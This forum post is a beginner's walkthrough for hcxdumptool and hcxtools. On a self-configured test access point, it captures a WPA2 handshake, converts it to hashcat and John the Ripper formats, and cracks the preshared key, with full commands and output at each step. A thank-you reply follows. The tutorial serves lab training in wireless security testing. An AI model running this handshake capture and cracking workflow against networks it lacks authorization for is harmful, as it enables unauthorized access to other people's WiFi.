hcxdumptool/hcxlabtool and hcxtools basic steps for beginners

[ZerBea]

This discussion describes how to get firm with hcxdumptool/hcxlabtool and hcxtools.
For this, a development environment must be defined. Otherwise you learn nothing!
The entire work flow (setup test target, command line options and expected results) is described below (for hashcat and for JtR)!

step 1
Make sure you're running a recommended Linux kernel as mentioned in README.md section requirements.
Also make sure that your distribution is up to date and well configured (this is addressed to Kali users)!

$ uname -r
6.6.70-1-lts

step 2
get information about the running services:

$ sudo systemctl --type=service --state=running
  UNIT                     LOAD   ACTIVE SUB     DESCRIPTION                                   
  accounts-daemon.service  loaded active running Accounts Service
  acpid.service            loaded active running ACPI event daemon
  cups.service             loaded active running CUPS Scheduler
  dbus-broker.service      loaded active running D-Bus System Message Bus
  lightdm.service          loaded active running Light Display Manager
  NetworkManager.service   loaded active running Network Manager
  ntpd.service             loaded active running Network Time Service
  polkit.service           loaded active running Authorization Manager
  systemd-journald.service loaded active running Journal Service
  systemd-logind.service   loaded active running User Login Management
  systemd-udevd.service    loaded active running Rule-based Manager for Device Events and Files
  systemd-userdbd.service  loaded active running User Database Manager
  udisks2.service          loaded active running Disk Manager
  upower.service           loaded active running Daemon for power management
  [email protected]        loaded active running User Manager for UID 1000
  wpa_supplicant.service   loaded active running WPA supplicant

These are my running services. Your services list may look different.

step 3
identify the services that take ACCESS to the WiFi interface:

  NetworkManager.service   loaded active running Network Manager
  wpa_supplicant.service   loaded active running WPA supplicant

step 4
stop this services:

sudo systemctl stop NetworkManager.service
sudo systemctl stop wpa_supplicant.service

step 5
configure your test target ACCESS POINT

set PSK to 12345678
set ESSID e.g. to AP_7272 (to follow this work flow)
set operating channel to a less crowded channel (e.g. 8a)

step 6
get information about your WiFi device

$ sudo hcxdumptool -l
  1	  4	d84489b60138	d84489b60138	+	wlp48s0f4u2u3   	rtl8xxxu	NETLINK

step 7
run hcxdumptool rcascan to get information about your target

$ sudo hcxdumptool -i wlp48s0f4u2u3 --rcascan=active -F

Requesting physical interface capabilities. This may take some time.
Please be patient...

interface information:

phy idx hw-mac       virtual-mac  m ifname           driver (protocol)
---------------------------------------------------------------------------------------------
  1   4 d84489b60138 9c93e4c79b56 + wlp48s0f4u2u3    rtl8xxxu (NETLINK)


available frequencies: frequency [channel] tx-power of Regulatory Domain: DE

  2412 [  1] 20.0 dBm	  2417 [  2] 20.0 dBm	  2422 [  3] 20.0 dBm	  2427 [  4] 20.0 dBm
  2432 [  5] 20.0 dBm	  2437 [  6] 20.0 dBm	  2442 [  7] 20.0 dBm	  2447 [  8] 20.0 dBm
  2452 [  9] 20.0 dBm	  2457 [ 10] 20.0 dBm	  2462 [ 11] 20.0 dBm	  2467 [ 12] 20.0 dBm
  2472 [ 13] 20.0 dBm	  2484 [ 14] disabled


scan frequencies: frequency [channel] of Regulatory Domain: DE

  2412 [  1]	  2417 [  2]	  2422 [  3]	  2427 [  4]	  2432 [  5]
  2437 [  6]	  2442 [  7]	  2447 [  8]	  2452 [  9]	  2457 [ 10]
  2462 [ 11]	  2467 [ 12]	  2472 [ 13]

This is a highly experimental penetration testing tool!
It is made to detect vulnerabilities in your NETWORK mercilessly!
Misuse a network, without specific authorization,
may cause irreparable damage and result in significant consequences!
Not understanding what you were doing> is not going to work as an excuse!

BPF is unset! Make sure hcxdumptool is running in a 100% controlled environment!

Initialize main scan loop...
...
 CHA  FREQ  BEACON  RESPONSE S    MAC-AP    ESSID  SCAN-FREQUENCY:   2447
--------------------------------------------------------------------------
...
   8  2447 10:20:34 10:20:34 + ccce1edc3bee AP_7272 [24]
...
^C
784 Packet(s) captured by kernel
12 Packet(s) dropped by kernel
304 PROBERESPONSE(s) captured

exit on sigterm

Test target: AP_7272
Operating channel 8a
received PROBERESPONSES 24 == target is in range and it responds to hcxdumptool.

step 8
compile attack BPF:
$ hcxdumptool --bpfc="wlan addr3 ccce1edc3bee or wlan addr3 ffffffffffff" > attack.bpf
the compiled BPF should look similar to this:

$ cat attack.bpf
48 0 0 3
100 0 0 8
7 0 0 0
48 0 0 2
76 0 0 0
2 0 0 0
7 0 0 0
80 0 0 0
84 0 0 12
21 8 0 4
64 0 0 18
21 0 2 517749742
72 0 0 16
21 3 4 52430
21 0 3 4294967295
72 0 0 16
21 0 1 65535
6 0 0 1024
6 0 0 0

step 9
connect a CLIENT to your target AP (you don't need this if the AP uses PMKID caching)

step 10
run the attack
$ sudo hcxdumptool -i wlp48s0f4u2u3 -w test.pcapng -c 8a --bpf=attack.bpf --rds=1
the status should shwo something like this:

 CHA   LAST   R 1 3 P S    MAC-AP    ESSID (last EAPOL on top)    SCAN-FREQUENCY:   2447
-----------------------------------------------------------------------------------------
   8 10:30:05 + + +   + ccce1edc3bee AP_7272

   LAST   E 2 MAC-AP-ROGUE   MAC-CLIENT   ESSID (last M2ROGUE on top)
-----------------------------------------------------------------------------------------
 10:29:58     ccce1edc3bee 74da38f2038e AP_7272
^C
557 Packet(s) captured by kernel
0 Packet(s) dropped by kernel
1 SHB written to pcapng dumpfile
1 IDB written to pcapng dumpfile
1 ECB written to pcapng dumpfile
96 EPB written to pcapng dumpfile

exit on sigterm

CHA LAST R 1 3 P S MAC-AP ESSID (last EAPOL on top) SCAN-FREQUENCY: 2447

8 10:30:05 + + + + ccce1edc3bee AP_7272
a "+" in column R == target is an range
a "+" in column 1 == we got an EAPOL M1 from the target, but the target doesn't use PMKIDs (empty column P)
a "+" in column S == AP uses a by hashcat or JtR supported hash mode
a "+" in column 3 == we got an authorized handshake (either M1M2M3 or M1M2M3M4) hashcat or JtR can work on

LAST E 2 MAC-AP-ROGUE MAC-CLIENT ESSID (last M2ROGUE on top)

10:29:58 ccce1edc3bee 74da38f2038e AP_7272
the CLIENT 74da38f2038e is authenticated to the target AP
no "+" plus in column 2 == the CLIENT is not connected to hcxdumptool (because our test BPF prevent this"

step 11 (for hashcat)
convert the dump file to hc22000

$ ls *.pcapng
test.pcapng

$ hcxpcapngtool -o test.hc22000 test.pcapng
hcxpcapngtool 6.3.5-17-gad27da5 reading from test.pcapng...

summary capture file
--------------------
file name................................: test.pcapng
version (pcapng).........................: 1.0
operating system.........................: Linux 6.6.70-1-lts
application..............................: hcxdumptool 6.3.5-14-g13b5fcc
interface name...........................: wlp48s0f4u2u3
interface vendor.........................: d84489
openSSL version..........................: 1.0
weak candidate...........................: 12345678
MAC ACCESS POINT.........................: 0016b450fc9b (incremented on every new client)
MAC CLIENT...............................: b0ece14ebd1b
REPLAYCOUNT..............................: 64068
ANONCE...................................: 6b9baa12d1ee6c3a3b54d23debb9dfc621b88340a55c77f907d99c4bc5204c70
SNONCE...................................: d9eca0735b064968f027cdf02f17c6cb63cb4a55ae911632ce5a17888525e66d
timestamp minimum (timestamp)............: 11.01.2025 09:29:37 (1736587777)
timestamp maximum (timestamp)............: 11.01.2025 09:29:58 (1736587798)
duration of the dump tool (seconds)......: 20
used capture interfaces..................: 1
link layer header type...................: DLT_IEEE802_11_RADIO (127)
endianness (capture system)..............: little endian
packets inside...........................: 96
packets received on 2.4 GHz..............: 96
ESSID (total unique).....................: 1
BEACON (total)...........................: 1
BEACON on 2.4 GHz channel (from IE_TAG)..: 8 
PROBEREQUEST (undirected)................: 1
PROBERESPONSE (total)....................: 1
AUTHENTICATION (total)...................: 3
AUTHENTICATION (OPEN SYSTEM).............: 3
ASSOCIATIONREQUEST (total)...............: 2
ASSOCIATIONREQUEST (PSK).................: 2
EAPOL messages (total)...................: 88
EAPOL RSN messages.......................: 88
EAPOLTIME gap (measured maximum msec)....: 36
EAPOL ANONCE error corrections (NC)......: not detected
REPLAYCOUNT gap (measured maximum).......: 1024
EAPOL M1 messages (total)................: 85
EAPOL M2 messages (total)................: 1
EAPOL M3 messages (total)................: 1
EAPOL M4 messages (total)................: 1
EAPOL M4 messages (zeroed NONCE).........: 1
EAPOL pairs (total)......................: 2
EAPOL pairs (best).......................: 1
EAPOL pairs written to 22000 hash file...: 1 (RC checked)
EAPOL M32E2 (authorized).................: 1

frequency statistics from radiotap header (frequency: received packets)
-----------------------------------------------------------------------
 2447: 96	

session summary
---------------
processed pcapng files................: 1

the converted hash should look like this:

$ cat test.hc22000
WPA*02*b7fa76dd6b7cca63b2c166f544ef6fd2*ccce1edc3bee*74da38f2038e*41505f37323732*1e633b4704227c0df7fb1e88991694eb3db6c4063cd3e819d28db42b67f24b30*0103007502010a00000000000000000001c34534a59e7a26ac6df9da65e62a050d0f1be2e997c5845fc1317e0b0a88d467000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001630140100000fac020100000fac040100000fac028c00*82

step 12 (for hashcat)
run hashcat to recover the PSK

$ hashcat -m 22000 test.hc22000 -a3 12345678
hashcat (v6.2.6-851-g6716447df) starting
...
b7fa76dd6b7cca63b2c166f544ef6fd2:ccce1edc3bee:74da38f2038e:AP_7272:12345678
                                                          
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 22000 (WPA-PBKDF2-PMKID+EAPOL)
Hash.Target......: test.hc22000
Time.Started.....: Sat Jan 11 10:45:45 2025 (0 secs)
Time.Estimated...: Sat Jan 11 10:45:45 2025 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Mask.......: 12345678 [8]
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:       91 H/s (0.42ms) @ Accel:8 Loops:256 Thr:256 Vec:1
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 1/1 (100.00%)
Rejected.........: 0/1 (0.00%)
Restore.Point....: 0/1 (0.00%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: 12345678 -> 12345678
Hardware.Mon.#1..: Temp: 40c Fan:  0% Util:  0% Core:2760MHz Mem:11201MHz Bus:16

Started: Sat Jan 11 10:45:44 2025
Stopped: Sat Jan 11 10:45:46 2025

step 11 (for JtR)
convert the dump file to JtR

$ ls *.pcapng
test.pcapng

$ hcxpcapngtool --john=test.john test.pcapng
hcxpcapngtool 6.3.5-17-gad27da5 reading from test.pcapng...

summary capture file
--------------------
file name................................: test.pcapng
version (pcapng).........................: 1.0
operating system.........................: Linux 6.6.70-1-lts
application..............................: hcxdumptool 6.3.5-14-g13b5fcc
interface name...........................: wlp48s0f4u2u3
interface vendor.........................: d84489
openSSL version..........................: 1.0
weak candidate...........................: 12345678
MAC ACCESS POINT.........................: 0016b450fc9b (incremented on every new client)
MAC CLIENT...............................: b0ece14ebd1b
REPLAYCOUNT..............................: 64068
ANONCE...................................: 6b9baa12d1ee6c3a3b54d23debb9dfc621b88340a55c77f907d99c4bc5204c70
SNONCE...................................: d9eca0735b064968f027cdf02f17c6cb63cb4a55ae911632ce5a17888525e66d
timestamp minimum (timestamp)............: 11.01.2025 09:29:37 (1736587777)
timestamp maximum (timestamp)............: 11.01.2025 09:29:58 (1736587798)
duration of the dump tool (seconds)......: 20
used capture interfaces..................: 1
link layer header type...................: DLT_IEEE802_11_RADIO (127)
endianness (capture system)..............: little endian
packets inside...........................: 96
packets received on 2.4 GHz..............: 96
ESSID (total unique).....................: 1
BEACON (total)...........................: 1
BEACON on 2.4 GHz channel (from IE_TAG)..: 8 
PROBEREQUEST (undirected)................: 1
PROBERESPONSE (total)....................: 1
AUTHENTICATION (total)...................: 3
AUTHENTICATION (OPEN SYSTEM).............: 3
ASSOCIATIONREQUEST (total)...............: 2
ASSOCIATIONREQUEST (PSK).................: 2
EAPOL messages (total)...................: 88
EAPOL RSN messages.......................: 88
EAPOLTIME gap (measured maximum msec)....: 36
EAPOL ANONCE error corrections (NC)......: not detected
REPLAYCOUNT gap (measured maximum).......: 1024
EAPOL M1 messages (total)................: 85
EAPOL M2 messages (total)................: 1
EAPOL M3 messages (total)................: 1
EAPOL M4 messages (total)................: 1
EAPOL M4 messages (zeroed NONCE).........: 1
EAPOL pairs (total)......................: 2
EAPOL pairs (best).......................: 1
EAPOL pairs written to old format JtR....: 1 (RC checked)
EAPOL M32E2 (authorized).................: 1

frequency statistics from radiotap header (frequency: received packets)
-----------------------------------------------------------------------
 2447: 96	


session summary
---------------
processed pcapng files................: 1

the converted hash should look like this:

$ cat test.john
AP_7272:$WPAPSK$AP_7272#nAsSr1jiRBcswUCCkoIodNtu7elhyRdZtWc31EwPsiaLlMFTkH3y0ke6p4QSMnh5/07w1TTv5cWN3dHfDPP2/XnHu/bGXPEfNz79A.21.5I0.Ec............/koIodNtu7elhyRdZtWc31EwPsiaLlMFTkH3y0ke6p4Q.................................................................3X.I.E..1uk0.E..1uk2.E..1uk0X...................................................................................................................................................................................../t.....U...9TuRhpfTAdXgg3axIHjPx6:74-da-38-f2-03-8e:cc-ce-1e-dc-3b-ee:ccce1edc3bee::WPA2:verified:test.pcapng

step 12 (for JtR)
recover the psk

$ echo "12345678" > wordlist

$ john -w:wordlist --format=wpapsk-opencl test.john
Device 1@tux1: NVIDIA GeForce RTX 4080
Using default input encoding: UTF-8
Loaded 1 password hash (wpapsk-opencl, WPA/WPA2/PMF/PMKID PSK [PBKDF2-SHA1 HMAC-SHA256/AES-CMAC OpenCL])
Note: Passwords longer than 21 [worst case UTF-8] to 63 [ASCII] rejected
Note: Minimum length forced to 8 by format
LWS=256 GWS=2490368 (9728 blocks) 
Press 'q' or Ctrl-C to abort, 'h' for help, almost any other key for status
Warning: Only 1 candidate buffered, minimum 2490368 needed for performance.
12345678         (AP_7272)     
1g 0:00:00:00 DONE (2025-01-11 10:51) 20.00g/s 20.00p/s 20.00c/s 20.00C/s Dev#1:34°C 12345678
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

[silan10]

Thank you very for your time
That's very clear instructions